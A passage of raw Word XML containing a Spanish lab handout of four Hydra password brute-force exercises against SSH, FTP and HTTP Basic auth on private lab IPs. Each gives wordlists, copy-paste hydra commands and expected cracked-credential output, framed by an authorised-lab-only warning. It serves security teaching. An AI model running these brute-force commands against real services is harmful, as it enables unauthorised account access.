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C1E4" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejercicios sencillitos de Hydra (lista corta y lista de comandos listos para copiar/pegar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFFDC7" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Importante — ética y seguridad:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> solo ejecutes estos ejercicios en máquinas/servicios que sean tuyos o en un laboratorio con autorización. Haz </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>snapshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> antes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE78CBD" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve">Cada ejercicio sigue el mismo formato: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>objetivo → preparación mínima → comando → salida esperada → qué entregar</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F1981" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:pict w14:anchorId="7A644785">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B526AF6" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1) Comprobar SSH local (usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>labuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>muy básico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE5E5F" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> ver cómo Hydra intenta contraseñas de una lista pequeña contra SSH.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> en la VM objetivo (ej. 10.8.1.85) crea el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>labuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> con contraseña pass123 (solo para la práctica).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (crear local):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D737DC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cat &gt; wordlist1.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86A221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123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06901A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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D2ED32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pass123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E25009" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20253DF1" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC603C4" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando (desde la máquina atacante):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B5F66" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>labuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -P wordlist1.txt -t 4 -f 10.8.1.85 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -V -o resultado1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7CD28" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salida esperada (por pantalla / en resultado1.txt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6502C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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh] host: 10.8.1.85   login: labuser   password: pass123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E7D41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1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F538" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> archivo resultado1.txt y pantallazo del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> mostrando la línea con credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC70736" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:pict w14:anchorId="7418A729">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="446C805A" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2) FTP simple con usuario conocido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184DF74" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> comprobar credenciales contra FTP.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> servicio FTP en 10.8.1.86 con usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ftpuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> y contraseña ftp2024.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317D280E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lastRenderedPageBreak/>
        <w:t>echo -e "ftp2024\n1234\npassword" &gt; wordlist2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29765C6E" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC4BC68" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ftpuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -P wordlist2.txt -t 4 -f 10.8.1.86 ftp -V -o resultado2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CB074" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salida esperada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648A47B4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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>21][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ftp] host: 10.8.1.86   login: ftpuser   password: ftp2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED9E02" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> resultado2.txt + explicación de por qué es peligroso usar contraseñas comunes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D36F7E" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:pict w14:anchorId="70D1B4D2">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07691A88" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3) HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>basic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (sitio con autenticación básica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B7A24" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> atacar autenticación HTTP básica (ej.: servicio que pide usuario/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> por diálogo del navegador).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> servidor web en 10.8.1.87 protegido con HTTP Basic para el recurso /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve">. Usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve">, contraseña </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>webpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF9B3C3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cat &gt; users.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271FCE9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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A002B8B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user1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393567B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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66697523" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BFB25A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cat &gt; passwords.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A2374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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EDD3F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webpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539ABE5C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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285AEA7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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A37B4" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A87B1C3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hydra -L users.txt -P passwords.txt 10.8.1.87 http-get /admin -t 4 -f -o resultado3.txt -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB3041" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Salida esperada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236D9BF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[80][http-get] host: 10.8.1.87   login: admin   password: webpass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C4DB3" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> resultado3.txt y captura de la página /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> después del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> correcto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734DB9A5" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="3812CFE7">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7E542" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4) Prueba con varios usuarios contra un servicio (modo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiupload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082C143" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> practicar -L y -P (usuarios y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> desde ficheros).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> servicio SSH en 10.8.1.85 con usuarios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>alicepwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve">) y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>bob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>bobpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ficheros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CE83B" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t>echo -e "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>nbob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>" &gt; users_simple.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5DE73" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t>echo -e "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>alicepwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>nbobpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>\n1234" &gt; pass_simple.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053BDE6" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A91A16" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -L users_simple.txt -P pass_simple.txt -t 4 -f 10.8.1.85 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -V -o resultado4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AAFD0" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salida esperada (puede mostrar 1 o 2 hallazgos):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B176EAA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[22][ssh] host: 10.8.1.85   login: alice   password: alicepwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD611F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[22][ssh] host: 10.8.1.85   login: bob     password: bobpwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83DBB9" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> resultado4.txt y breve tabla con usuarios encontrados / no encontrados.</w:t>
      </w:r>
    </w:p>
